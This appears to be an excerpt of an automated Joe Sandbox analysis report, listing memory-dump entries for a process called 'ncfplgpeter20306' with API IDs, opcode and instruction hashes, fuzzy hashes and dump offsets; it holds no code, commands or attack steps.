                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b363605e2f05c0e3201b493623aeb0d537589e819dd25c65d59295cc0d735b54
                                                  • Instruction ID: 71626311b8f4eebe98727f4a01bfef2aa319ef5e192e7182e824b7a91390a2c6
                                                  • Opcode Fuzzy Hash: b363605e2f05c0e3201b493623aeb0d537589e819dd25c65d59295cc0d735b54
                                                  • Instruction Fuzzy Hash: 79D1AF78E002188FDB54DFA5C990B9DBBB2FF89300F6481AAD809AB355EB315D81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8081464fe2e064984963827f7004a895ec0b20284e1a4e6616285bc207d58f97
                                                  • Instruction ID: a5d651552e492df544bc2a9674db5f41df6014811c1d8adbe357918e37f108a4
                                                  • Opcode Fuzzy Hash: 8081464fe2e064984963827f7004a895ec0b20284e1a4e6616285bc207d58f97
                                                  • Instruction Fuzzy Hash: C4D1AE74E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD809AB365EB315D81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 636c62404d55504e5d77822aed0ed9773bbb71bc4d073c47e1c11bf37fc59abd
                                                  • Instruction ID: a5f1ad1fbba3be27a2aa2d2e4588d720191872538ed01775e53ae70602ab4ab2
                                                  • Opcode Fuzzy Hash: 636c62404d55504e5d77822aed0ed9773bbb71bc4d073c47e1c11bf37fc59abd
                                                  • Instruction Fuzzy Hash: 21D1AE74E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD809AB355EB315D81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7da718c270718e183eddc806f023a7c31bb9c02984b8ec60237c75fcc5a93929
                                                  • Instruction ID: b1ad0c09cb36af5e58e608d475eb89be8734686c08f13a3e7f8681395e3e38a6
                                                  • Opcode Fuzzy Hash: 7da718c270718e183eddc806f023a7c31bb9c02984b8ec60237c75fcc5a93929
                                                  • Instruction Fuzzy Hash: 4AD1BF74E002188FDB54DFA9C990B9DBBB2FF89300F2481A9D409AB355EB356D81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d0658197db2a5faa49dc96dd077d5ea5319e6ca39aacc028fa1725d3e1488a1
                                                  • Instruction ID: 823fd8b2f359965db81f81d51387737b0647c1f301b5aa9071b231037f9d0d47
                                                  • Opcode Fuzzy Hash: 9d0658197db2a5faa49dc96dd077d5ea5319e6ca39aacc028fa1725d3e1488a1
                                                  • Instruction Fuzzy Hash: 09D1BF74E002188FDB54DFA9C994B9DBBB2FF89300F2481A9D409AB395EB355D81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e10482635678a8fd1b304bbf39461bcd26566d9eca86afcbbb4e6a9ed16de398
                                                  • Instruction ID: 5ef72767b20e7a1ff6e81e08b0a82135896bdfcb8e149e34312f5d61d5178cf3
                                                  • Opcode Fuzzy Hash: e10482635678a8fd1b304bbf39461bcd26566d9eca86afcbbb4e6a9ed16de398
                                                  • Instruction Fuzzy Hash: C9D1AF74E002188FDB54DFA5C990B9DBBB2FF89300F2481A9D809AB395EB355E85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3e7fa2e6e04272b3b6ec1c372ffd413e61a071c045971d1ac4bd84e0b7863d75
                                                  • Instruction ID: bf69a506c5b89c047293933138be79e9b27abda2171730f30403549308ad8794
                                                  • Opcode Fuzzy Hash: 3e7fa2e6e04272b3b6ec1c372ffd413e61a071c045971d1ac4bd84e0b7863d75
                                                  • Instruction Fuzzy Hash: EFC1BE74E00218CFDB54DFA5C994B9DBBB2FF89300F2485AAD409AB355EB359A81CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 297b38e02c8387b969858f6c3a6cdd216dc6550548a1b86bf08fe9efd22378e2
                                                  • Instruction ID: b478304b821b98fbd1c8facfb8821f9f0e6ce18a7689ecd67c65cf97aa310199
                                                  • Opcode Fuzzy Hash: 297b38e02c8387b969858f6c3a6cdd216dc6550548a1b86bf08fe9efd22378e2
                                                  • Instruction Fuzzy Hash: 9CC1AE74E00218CFDB54DFA5C994B9DBBB2FF89300F2485AAD409AB395DB359A81CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 40c42c88280c591ff81b5a907640d6fa5acb8fa382d34ce8e4e4df72caceb31a
                                                  • Instruction ID: 933643b02c42e5c6e96b721840d5849e408ff6b76e09f646f7d594bbe887aaac
                                                  • Opcode Fuzzy Hash: 40c42c88280c591ff81b5a907640d6fa5acb8fa382d34ce8e4e4df72caceb31a
                                                  • Instruction Fuzzy Hash: 61C1BE74E00218CFDB54DFA5C994B9DBBB2FB89300F2085AAD809AB355DB359A85CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6c1e52a579f196db57566a2b8c2ccdf3d74766d3a834287890c7ffc839c8b5c6
                                                  • Instruction ID: 99d2cc4ea1cdd4848c90ac2e055eb9fa1364c26ff08f3f30e7c1a82760e9565b
                                                  • Opcode Fuzzy Hash: 6c1e52a579f196db57566a2b8c2ccdf3d74766d3a834287890c7ffc839c8b5c6
                                                  • Instruction Fuzzy Hash: 7AC1AD74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD809AB355DB359A81CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 809d2eb967ec28153eb238e5ebd28553e1e3153d215270e8ab881b74b961d841
                                                  • Instruction ID: 197be997b73312d6fce65ef81197979e98e6a2f0a8888aff6938f1768aeb5b5f
                                                  • Opcode Fuzzy Hash: 809d2eb967ec28153eb238e5ebd28553e1e3153d215270e8ab881b74b961d841
                                                  • Instruction Fuzzy Hash: 85C1BE74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD809AB355DB359A81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2a9c78fa89381e29d57ea93d8a95c2311a5037f7e75da98fa377b9db8463b528
                                                  • Instruction ID: 549a087bc13baf8fba1cc82ab2ff0b7ddbf386261258aa20fa5895da737eb0c4
                                                  • Opcode Fuzzy Hash: 2a9c78fa89381e29d57ea93d8a95c2311a5037f7e75da98fa377b9db8463b528
                                                  • Instruction Fuzzy Hash: 41C1CE74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD809AB355DB359A81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 14de366d20b2d31f066e870a6ffc2fcf732221b9b7de33a3effce7490782e17c
                                                  • Instruction ID: b41f4f634025db7ffe2df1c71b0ca6b1f08dd389abc321d58fa1fcfde64f6437
                                                  • Opcode Fuzzy Hash: 14de366d20b2d31f066e870a6ffc2fcf732221b9b7de33a3effce7490782e17c
                                                  • Instruction Fuzzy Hash: 8BC1BD74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD809AB355DB359A81CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f6766b9cac8f63f8e671942824cec5002205b0f9565371b68e2c2128effbc2ed
                                                  • Instruction ID: eda67e8c57811b6fa4bc3daaf453f6611378062ca59e05911739f3046e061f14
                                                  • Opcode Fuzzy Hash: f6766b9cac8f63f8e671942824cec5002205b0f9565371b68e2c2128effbc2ed
                                                  • Instruction Fuzzy Hash: CBC1BE74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD809AB355DB359A81CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 089aee29ba004ca6e12c1c3232ef41dd46bb754dd495132f2cdc742674a98bc6
                                                  • Instruction ID: d992879d8c25a58dfe4b50726e6f395fe481a27ad1e9951d0dc5f8a4bb80d9f5
                                                  • Opcode Fuzzy Hash: 089aee29ba004ca6e12c1c3232ef41dd46bb754dd495132f2cdc742674a98bc6
                                                  • Instruction Fuzzy Hash: 6AC1BF74E00218CFDB54DFA5C994B9DBBB2FF89300F2081AAD409AB355DB359A85CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 9e29dcdb44b0e14794cf43cabf9d7150e2f31b4a56c74fe85cef528094a18e31
                                                  • Instruction ID: 59aeceace17f5fd4208ae3f225d3ddc9286c45f04f8fcac930af93417167d50d
                                                  • Opcode Fuzzy Hash: 9e29dcdb44b0e14794cf43cabf9d7150e2f31b4a56c74fe85cef528094a18e31
                                                  • Instruction Fuzzy Hash: FCC1BE74E00218CFDB54DFA5C994B9DBBB2FF89300F2485AAD809AB355DB359A81CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c383d0abab400aaedbcb10aedc637e1edf37d602e6c9e1f7db67ffc828242e66
                                                  • Instruction ID: 090783e8763dc8a3602d0a6693c69ced861943e80a260db9fb9b539287e989d6
                                                  • Opcode Fuzzy Hash: c383d0abab400aaedbcb10aedc637e1edf37d602e6c9e1f7db67ffc828242e66
                                                  • Instruction Fuzzy Hash: 1EC1BF74E01218CFDB54DFA5C994B9DBBB2FB89300F2481AAD809AB355DB359E81CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c531af2887c71760b66d23536f4fdab14e6a1ec4618038f0d2df4e0229574b98
                                                  • Instruction ID: 6ad832b63953f267f7080a27978d9bbf34cbe77c25cabcb158bc6287a8d6dbaf
                                                  • Opcode Fuzzy Hash: c531af2887c71760b66d23536f4fdab14e6a1ec4618038f0d2df4e0229574b98
                                                  • Instruction Fuzzy Hash: CEC1AE74E00218CFDB54DFA5C994B9DBBB2FB89300F2085AAD409AB355EB359A85CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 57b442fe10c8e5b095aad884a520aa3da1cafd10e1f234ad5c183f225574384b
                                                  • Instruction ID: a419c0ac23b400b620d7b3e87f05af147bc633bf96f1254e1f6e2076dfda9f2b
                                                  • Opcode Fuzzy Hash: 57b442fe10c8e5b095aad884a520aa3da1cafd10e1f234ad5c183f225574384b
                                                  • Instruction Fuzzy Hash: 2AC1AE74E00218CFDB54DFA5C994B9DBBB2FB89300F2085AAD809AB355DB359A85CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6b252b5d4d8175a7951ee288c4d8e8fe929a1b82c6d0ea2f3386d22d7ce6526c
                                                  • Instruction ID: 51ac2e911c0498d754fa7b89d43de04fa03a1eb477818fa24624e7e904d624ec
                                                  • Opcode Fuzzy Hash: 6b252b5d4d8175a7951ee288c4d8e8fe929a1b82c6d0ea2f3386d22d7ce6526c
                                                  • Instruction Fuzzy Hash: 0BC1AD74E00218CFDB54DFA5C994BADBBB2FB89300F2085AAD409AB355DB359A81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 490351a3a520a4dce7d98c69753b775e0906ea3da0ba3d33d3fe388208bd5707
                                                  • Instruction ID: 05027cba4372e725430a1e0ffdd8b63ad351ae28f60cb614e8a78cbd2340d929
                                                  • Opcode Fuzzy Hash: 490351a3a520a4dce7d98c69753b775e0906ea3da0ba3d33d3fe388208bd5707
                                                  • Instruction Fuzzy Hash: 2DC1AF74E00218CFDB54DFA5C954B9DBBB2FB89300F2085AAD809AB355EB359E81CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 51e5b0d6e466c46a1ef298b976ddb6c6d7c7a233f44f30ea5a59a68772c84207
                                                  • Instruction ID: f5700b88d977cf3342701392cec8d82a14765608c94acac4b5cc185e2f933ef2
                                                  • Opcode Fuzzy Hash: 51e5b0d6e466c46a1ef298b976ddb6c6d7c7a233f44f30ea5a59a68772c84207
                                                  • Instruction Fuzzy Hash: B6C1AF74E00218CFDB54DFA5C994B9DBBB2FF89300F1485AAD409AB355DB359A81CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 94d145e0988d2b07993f276646722775fb3ba23543367ee8bb497bf70a7732f0
                                                  • Instruction ID: 8ad916458a18b4f79d2709d40ab7b3a377398ac1b579bf31cacfaad589f4d268
                                                  • Opcode Fuzzy Hash: 94d145e0988d2b07993f276646722775fb3ba23543367ee8bb497bf70a7732f0
                                                  • Instruction Fuzzy Hash: 09C1AD74E00218CFDB54DFA5C994B9DBBB2FB89300F2485AAD809AB355DB359A81CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7767fb478e29f48ae0d7bf983a90d46fa095f4ed4e0654c028a4ad80b80fa5c7
                                                  • Instruction ID: ff193b3d20dd73fe67ae9b355daeb3768252ca56e7b6d387bffd17dc81b1322f
                                                  • Opcode Fuzzy Hash: 7767fb478e29f48ae0d7bf983a90d46fa095f4ed4e0654c028a4ad80b80fa5c7
                                                  • Instruction Fuzzy Hash: 63C1BE74E00218CFDB54DFA5C994B9DBBB2FB89300F2085AAD809AB355DB359E85CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d1789dc7e0c8abe7b9925e968b43584abf38ff0fe43a9872dbc14fd24f415ce3
                                                  • Instruction ID: b85ca213ae1bbe7f8678bd39c31ac672bf59602e224c8d7b90073932bbe1636e
                                                  • Opcode Fuzzy Hash: d1789dc7e0c8abe7b9925e968b43584abf38ff0fe43a9872dbc14fd24f415ce3
                                                  • Instruction Fuzzy Hash: 84C1AD74E00218CFDB54DFA5C994B9DBBB2FF89300F2485AAD809AB355DB359A81CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8da196e07a09c96c23c69f918f843214a2cee15b70c5649517b745444b898b75
                                                  • Instruction ID: 84071d76acc29630c37106f2f8b5594307ae386a80db1b1d84e11ce24e8406d3
                                                  • Opcode Fuzzy Hash: 8da196e07a09c96c23c69f918f843214a2cee15b70c5649517b745444b898b75
                                                  • Instruction Fuzzy Hash: D6C1AF74E00218CFDB54DFA5C954B9DBBB2FF89300F1485AAD409AB355DB359A81CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a134ea67d89ab68bb8ee410ba1a66591b9e31ddf92a41e27bb69a026bd928e56
                                                  • Instruction ID: 7f57fb5774101765b2f788df19eaac454e0e1ab7921cccdc4c6936b992829414
                                                  • Opcode Fuzzy Hash: a134ea67d89ab68bb8ee410ba1a66591b9e31ddf92a41e27bb69a026bd928e56
                                                  • Instruction Fuzzy Hash: 80C1BD74E00218CFDB54DFA5C994B9DBBB2FB89300F2085AAD809AB355DB359A81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 778ff109c83543f294c0b1c7bd270ccf0fc6fd506cf40d3144b06f3ca8cc0848
                                                  • Instruction ID: e99f84bec78e1bc550e2f6918974e8d700f40bbd6d5be509f418db0846a2eaf4
                                                  • Opcode Fuzzy Hash: 778ff109c83543f294c0b1c7bd270ccf0fc6fd506cf40d3144b06f3ca8cc0848
                                                  • Instruction Fuzzy Hash: 03C1BE74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD409AB355EB359A85CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7df949d0c5471d3a3ceb58c5bbd895695c872083390e599ec88674611ffe6f1a
                                                  • Instruction ID: 77473de3d0ed0cb63a478f05dfb4009092a1848d0abe020d78f4154eb959ea6a
                                                  • Opcode Fuzzy Hash: 7df949d0c5471d3a3ceb58c5bbd895695c872083390e599ec88674611ffe6f1a
                                                  • Instruction Fuzzy Hash: 51C1BE74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD409AB355DB359A81CF50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: